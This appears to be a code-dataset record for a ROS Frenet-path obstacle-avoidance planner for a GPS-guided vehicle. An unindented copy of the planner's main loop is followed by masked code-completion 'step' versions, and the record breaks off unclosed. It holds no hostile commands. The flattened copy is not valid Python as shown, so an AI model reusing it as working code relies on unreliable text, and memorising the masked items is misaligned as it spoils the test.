c, s = np.cos(curr_yaw), np.sin(curr_yaw)
R = (np.array(((c,-s), (s, c))))
pt=pt.dot(R)+T
return pt
def get_arc_length(tx,ty,st):
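    # Accumulate the Euclidean distance between consecutive reference points up to index st,
    # i.e. the arc length s travelled along the reference path.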
arc_length=0
for x in range(1,st):
arc_length=arc_length+(np.hypot((tx[x-1]-tx[x]),(ty[x-1]-ty[x])))
return arc_length
def get_lateral_dist(tx,ty,curr_posx,curr_posy):
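    # Find the nearest reference point and the signed lateral offset of the current position;
    # the sign depends on which side of the reference path the vehicle is on.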
dist=[]
for x in range(0,len(tx)-1):
dist.append(np.hypot((float(curr_posx)-tx[x]),(float(curr_posy)-ty[x])))
lat_dist=min(dist)
st=dist.index(min(dist))
theta1=math.atan2((ty[st]-ty[st-1]),(tx[st]-tx[st-1]))
theta2=math.atan2((curr_posy-ty[st-1]),(curr_posx-tx[st-1]))
if lat_dist<THRESH_DIST:
lat_dist=0
curr_posx=tx[st]
curr_posy=ty[st]
if theta2<theta1:
lat_dist=-lat_dist
# print(lat_dist)
return st, lat_dist, curr_posx, curr_posy
def proportional_control(target, current):
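    # Simple P controller: acceleration proportional to the speed error (gain 1.0).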
#print("*"*50)
#print("current=",current)
#print("target - current",target - current)
a = 1.0 * (target - current)
return a
def main():
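    # Load the recorded GPS waypoints, build the reference spline and road boundaries,
    # then in the ROS loop transform detected obstacles into the map frame, run the
    # Frenet planner and publish the resulting speed and local path.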
ptx = []
pty = []
ptx, pty = load_global_path()
tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)
#print(csp)
road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(ptx, pty)
    # current vehicle speed and acceleration
c_speed = 5.0/3.6
c_acc = 1.0
c_d_dd = 0
c_d_d = 0
area = 25.0 # animation area length [m]
start = time.time()
rospy.init_node('AvoidObstacles_PlannerOut', anonymous = False)
my_node = Info()
while not rospy.is_shutdown():
CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity = my_node.init()
#print("gob",gob)
ob = []
if (CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1):
#print(CurrGPS_lat,CurrGPS_lon,ImuYaw, curr_posx, curr_posy)
#print(gobx,goby,gob)
#path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)
#s0 = path.s[1]
#c_d = path.d[1]
#c_d_d = path.d_d[1]
#c_d_dd = path.d_dd[1]
#c_speed = path.s_d[1]
curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
T = [curr_posx, curr_posy]
curr_yaw = ImuYaw #+ math.pi / 2
if (len(gob) == 0):
ob = [[-20, -20]]
else:
ob = gob
ob_len = len(ob)-1
for x in xrange(0, ob_len):
#print("ob_transformation",ob)
ob = np.array(ob)
#ob[x, :] = .2 * ob[x, :]
ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)
#print("ob_transformation",ob)
#############################################################
# c_d_dd = c_acc*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))+curr_yaw)
#spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)
#curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
try:
curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)
s0 = get_arc_length(tx, ty, spt)
path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)
c_speed = path.s_d[1]
#c_d_d = c_speed*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))-curr_yaw)
c_d_d = path.d_d[1]
c_d_dd = path.d_dd[1]
if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:
print("Goal")
c_speed = 0.0
break
if show_animation:
plt.cla()
plt.plot(tx, ty, "-.k")
plt.plot(road_left_x, road_left_y, "-k")
plt.plot(road_right_x, road_right_y, "-k")
plt.plot(ob[:, 0], ob[:, 1], "ob")
plt.plot(path.x[1:], path.y[1:], "-or")
plt.plot(path.x[1], path.y[1], "vc")
plt.xlim(path.x[1] - area, path.x[1] + area)
plt.ylim(path.y[1] - area, path.y[1] + area)
plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw), math.sin(curr_yaw),fc="r", ec="k", head_width=0.5, head_length=1.0)
plt.title("v[km/h]:" + str(c_speed)[0:4])
                    plt.xlabel(u'x/m', fontsize=14)  # x-axis label and font size
                    plt.ylabel(u'y/m', fontsize=14)  # y-axis label and font size
plt.pause(0.0001)
                ############## planning succeeded ##########
                ###########################################
                PathFail_flag = 0
                ###########################################
except:
                ############## planning failed #########
                PathFail_flag = 1
                print("Could not find an optimal path")
                ########## clear the obstacle buffer #######
############################################
############################################
global Gob_x
global Gob_y
Gob_x*=0
Gob_y*=0
############################################
############################################
###############################################################################
try:
'''
acc = proportional_control(6, CurrentVelocity)
temp1=path.yaw[1] `
temp2=curr_yaw
if temp1<0:
temp1=6.28+temp1
if temp2<0:
temp2=6.28+temp2
val = temp1-temp2
if val > 3.14:
val = val - 6.28
if val < -3.14:
val = val + 6.28
val = math.degrees(val)
if val > 50:
val = 50
if val < -50:
val = -50
my_node.talker(acc,val)
'''
path_record = localPath()
                # fill in the path message
for i in range(len(path.x[1:])):
#print("path_x",path.x[i])
path_record.path_x.append(path.x[i])
path_record.path_y.append(path.y[i])
                    # cap the number of stored path points
if len(path_record.path_x) > 10000:
path_record.path_x.pop(0)
path_record.path_y.pop(0)
                # publish the path
my_node.talker(c_speed, path_record)
except:
print("local path send fail")
pass
#my_node.talker(c_speed, path.x[1:], path.y[1:])
#except:
# pass
print("Finish")
end = time.time()
#print("total time: ", end - start)
if show_animation:
plt.grid(True)
plt.show()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "4647a7d0996ceeef4f39cf3182ac3944d25cb349",
"index": 8197,
"step-1": "<mask token>\n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n frenet_paths = []\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, \n TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n Jp = sum(np.power(tfp.d_ddd, 2))\n Js = sum(np.power(tfp.s_ddd, 2))\n ds = (TARGET_SPEED - tfp.s_d[-1]) ** 2\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1] ** 2\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\n<mask token>\n\n\ndef check_collision(fp, ob):\n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0]) ** 2 + (iy - ob[i, 1]) ** 2) for ix, iy in\n zip(fp.x, fp.y)]\n collision = any([(di <= ROBOT_RADIUS ** 2) for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([(v > MAX_SPEED) for v in fplist[i].s_d]):\n continue\n elif any([(abs(a) > MAX_ACCEL) for a in fplist[i].s_dd]):\n continue\n elif any([(abs(c) > MAX_CURVATURE) for c in fplist[i].c]):\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\n<mask token>\n\n\ndef generate_road_widle(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\ndef load_global_path():\n global zero_cord_x, zero_cord_y\n bet = 0.1\n blank = []\n white = []\n 
yellow = []\n GPS_x = []\n GPS_y = []\n nums, ber = np.loadtxt(\n '/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt'\n , dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank:\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0]\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2)\n if dis > bet:\n GPS_x.append(yellow[i])\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i]\n GPS_x = np.array(GPS_x)\n GPS_y = np.array(GPS_y)\n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x, GPS_y, '-r', label='GPS point ')\n plt.plot()\n plt.show()\n return GPS_x, GPS_y\n\n\nclass Info(object):\n\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n rospy.Subscriber('coordinate', Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.\n FeedbackCallbackGPSIMU, queue_size=10)\n rospy.Subscriber('Motor_Feedback_mssage', Motor_Feedback, self.\n RVcallback, queue_size=10)\n\n def FeedbackCallbackGPSIMU(self, msg):\n self.CurrGPS_lat = msg.latitude\n self.CurrGPS_lon = msg.longitude\n self.ImuYaw = (90 - msg.course_angle) * np.pi / 180\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby)\n self.gob = np.column_stack((Gob_x, Gob_y))\n\n def RVcallback(self, msg):\n self.CurrentVelocity = msg.Base_Vehspd\n\n def init(self):\n return (self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx,\n self.goby, self.gob, self.CurrentVelocity)\n\n def talker(self, Target_Velocity, path_record):\n self.rate = rospy.Rate(100)\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32,\n queue_size=10)\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size=50)\n self.pub_Velocity.publish(Target_Velocity)\n self.path_pub.publish(path_record)\n\n\ndef get_transalation(curr_gps_lat, curr_gps_lon):\n curr_posy = float(curr_gps_lon) - zero_cord_y\n curr_posx = float(curr_gps_lat) - zero_cord_x\n return curr_posx, curr_posy\n\n\ndef get_transformation(pt, curr_yaw, T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = np.array(((c, -s), (s, c)))\n pt = pt.dot(R) + T\n return pt\n\n\n<mask token>\n\n\ndef get_lateral_dist(tx, ty, curr_posx, curr_posy):\n dist = []\n for x in range(0, len(tx) - 1):\n dist.append(np.hypot(float(curr_posx) - tx[x], float(curr_posy) -\n ty[x]))\n lat_dist = min(dist)\n st = dist.index(min(dist))\n theta1 = math.atan2(ty[st] - ty[st - 1], tx[st] - tx[st - 1])\n theta2 = math.atan2(curr_posy - ty[st - 1], curr_posx - tx[st - 1])\n if lat_dist < THRESH_DIST:\n lat_dist = 0\n curr_posx = tx[st]\n curr_posy = ty[st]\n if theta2 < theta1:\n lat_dist = -lat_dist\n return st, lat_dist, curr_posx, curr_posy\n\n\ndef proportional_control(target, current):\n a = 1.0 * (target - current)\n return a\n\n\ndef main():\n ptx = []\n pty = []\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(\n ptx, pty)\n c_speed = 5.0 / 3.6\n 
c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous=False)\n my_node = Info()\n while not rospy.is_shutdown():\n (CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity\n ) = my_node.init()\n ob = []\n if CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n curr_yaw = ImuYaw\n if len(gob) == 0:\n ob = [[-20, -20]]\n else:\n ob = gob\n ob_len = len(ob) - 1\n for x in xrange(0, ob_len):\n ob = np.array(ob)\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat,\n CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty,\n curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d,\n c_d_dd, ob)\n c_speed = path.s_d[1]\n c_d_d = path.d_d[1]\n c_d_dd = path.d_dd[1]\n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print('Goal')\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, '-.k')\n plt.plot(road_left_x, road_left_y, '-k')\n plt.plot(road_right_x, road_right_y, '-k')\n plt.plot(ob[:, 0], ob[:, 1], 'ob')\n plt.plot(path.x[1:], path.y[1:], '-or')\n plt.plot(path.x[1], path.y[1], 'vc')\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw),\n math.sin(curr_yaw), fc='r', ec='k', head_width=0.5,\n head_length=1.0)\n plt.title('v[km/h]:' + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14)\n plt.ylabel(u'y/m', fontsize=14)\n plt.pause(0.0001)\n PathFail_flag = 0\n except:\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n global Gob_x\n global Gob_y\n Gob_x *= 0\n Gob_y *= 0\n try:\n \"\"\"\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n \"\"\"\n path_record = localPath()\n for i in range(len(path.x[1:])):\n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i])\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n my_node.talker(c_speed, path_record)\n except:\n print('local path send fail')\n pass\n print('Finish')\n end = time.time()\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n frenet_paths = []\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, \n TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n Jp = sum(np.power(tfp.d_ddd, 2))\n Js = sum(np.power(tfp.s_ddd, 2))\n ds = (TARGET_SPEED - tfp.s_d[-1]) ** 2\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1] ** 2\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\n<mask token>\n\n\ndef check_collision(fp, ob):\n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0]) ** 2 + (iy - ob[i, 1]) ** 2) for ix, iy in\n zip(fp.x, fp.y)]\n collision = any([(di <= ROBOT_RADIUS ** 2) for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([(v > MAX_SPEED) for v in fplist[i].s_d]):\n continue\n elif any([(abs(a) > MAX_ACCEL) for a in fplist[i].s_dd]):\n continue\n elif any([(abs(c) > MAX_CURVATURE) for c in fplist[i].c]):\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\ndef frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):\n ob = np.array(ob)\n fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)\n fplist = calc_global_paths(fplist, csp)\n fplist = check_paths(fplist, ob)\n mincost = float('inf')\n bestpath = None\n for fp in fplist:\n if mincost >= fp.cf:\n mincost = fp.cf\n bestpath = fp\n return bestpath\n\n\ndef generate_road_widle(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n 
s = np.arange(0, csp.s[-1], 0.1)\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\ndef load_global_path():\n global zero_cord_x, zero_cord_y\n bet = 0.1\n blank = []\n white = []\n yellow = []\n GPS_x = []\n GPS_y = []\n nums, ber = np.loadtxt(\n '/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt'\n , dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank:\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0]\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2)\n if dis > bet:\n GPS_x.append(yellow[i])\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i]\n GPS_x = np.array(GPS_x)\n GPS_y = np.array(GPS_y)\n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x, GPS_y, '-r', label='GPS point ')\n plt.plot()\n plt.show()\n return GPS_x, GPS_y\n\n\nclass Info(object):\n\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n rospy.Subscriber('coordinate', Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.\n FeedbackCallbackGPSIMU, queue_size=10)\n rospy.Subscriber('Motor_Feedback_mssage', Motor_Feedback, self.\n RVcallback, queue_size=10)\n\n def FeedbackCallbackGPSIMU(self, msg):\n self.CurrGPS_lat = msg.latitude\n self.CurrGPS_lon = msg.longitude\n self.ImuYaw = (90 - msg.course_angle) * np.pi / 180\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby)\n self.gob = np.column_stack((Gob_x, Gob_y))\n\n def RVcallback(self, msg):\n self.CurrentVelocity = msg.Base_Vehspd\n\n def init(self):\n return (self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx,\n self.goby, self.gob, self.CurrentVelocity)\n\n def talker(self, Target_Velocity, path_record):\n self.rate = rospy.Rate(100)\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32,\n queue_size=10)\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size=50)\n self.pub_Velocity.publish(Target_Velocity)\n self.path_pub.publish(path_record)\n\n\ndef get_transalation(curr_gps_lat, curr_gps_lon):\n curr_posy = float(curr_gps_lon) - zero_cord_y\n curr_posx = float(curr_gps_lat) - zero_cord_x\n return curr_posx, curr_posy\n\n\ndef get_transformation(pt, curr_yaw, T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = np.array(((c, -s), (s, c)))\n pt = pt.dot(R) + T\n return pt\n\n\n<mask token>\n\n\ndef get_lateral_dist(tx, ty, curr_posx, curr_posy):\n dist = []\n for x in range(0, len(tx) - 1):\n dist.append(np.hypot(float(curr_posx) - tx[x], float(curr_posy) -\n ty[x]))\n lat_dist = min(dist)\n st = dist.index(min(dist))\n theta1 = math.atan2(ty[st] - ty[st - 1], tx[st] - tx[st - 1])\n theta2 = math.atan2(curr_posy - ty[st - 1], curr_posx - tx[st - 1])\n if lat_dist < THRESH_DIST:\n lat_dist = 0\n curr_posx = tx[st]\n curr_posy = ty[st]\n if theta2 < theta1:\n lat_dist = -lat_dist\n return st, lat_dist, 
curr_posx, curr_posy\n\n\ndef proportional_control(target, current):\n a = 1.0 * (target - current)\n return a\n\n\ndef main():\n ptx = []\n pty = []\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(\n ptx, pty)\n c_speed = 5.0 / 3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous=False)\n my_node = Info()\n while not rospy.is_shutdown():\n (CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity\n ) = my_node.init()\n ob = []\n if CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n curr_yaw = ImuYaw\n if len(gob) == 0:\n ob = [[-20, -20]]\n else:\n ob = gob\n ob_len = len(ob) - 1\n for x in xrange(0, ob_len):\n ob = np.array(ob)\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat,\n CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty,\n curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d,\n c_d_dd, ob)\n c_speed = path.s_d[1]\n c_d_d = path.d_d[1]\n c_d_dd = path.d_dd[1]\n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print('Goal')\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, '-.k')\n plt.plot(road_left_x, road_left_y, '-k')\n plt.plot(road_right_x, road_right_y, '-k')\n plt.plot(ob[:, 0], ob[:, 1], 'ob')\n plt.plot(path.x[1:], path.y[1:], '-or')\n plt.plot(path.x[1], path.y[1], 'vc')\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw),\n math.sin(curr_yaw), fc='r', ec='k', head_width=0.5,\n head_length=1.0)\n plt.title('v[km/h]:' + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14)\n plt.ylabel(u'y/m', fontsize=14)\n plt.pause(0.0001)\n PathFail_flag = 0\n except:\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n global Gob_x\n global Gob_y\n Gob_x *= 0\n Gob_y *= 0\n try:\n \"\"\"\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n \"\"\"\n path_record = localPath()\n for i in range(len(path.x[1:])):\n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i])\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n my_node.talker(c_speed, path_record)\n except:\n print('local path send fail')\n pass\n print('Finish')\n end = time.time()\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\n<mask token>\n",
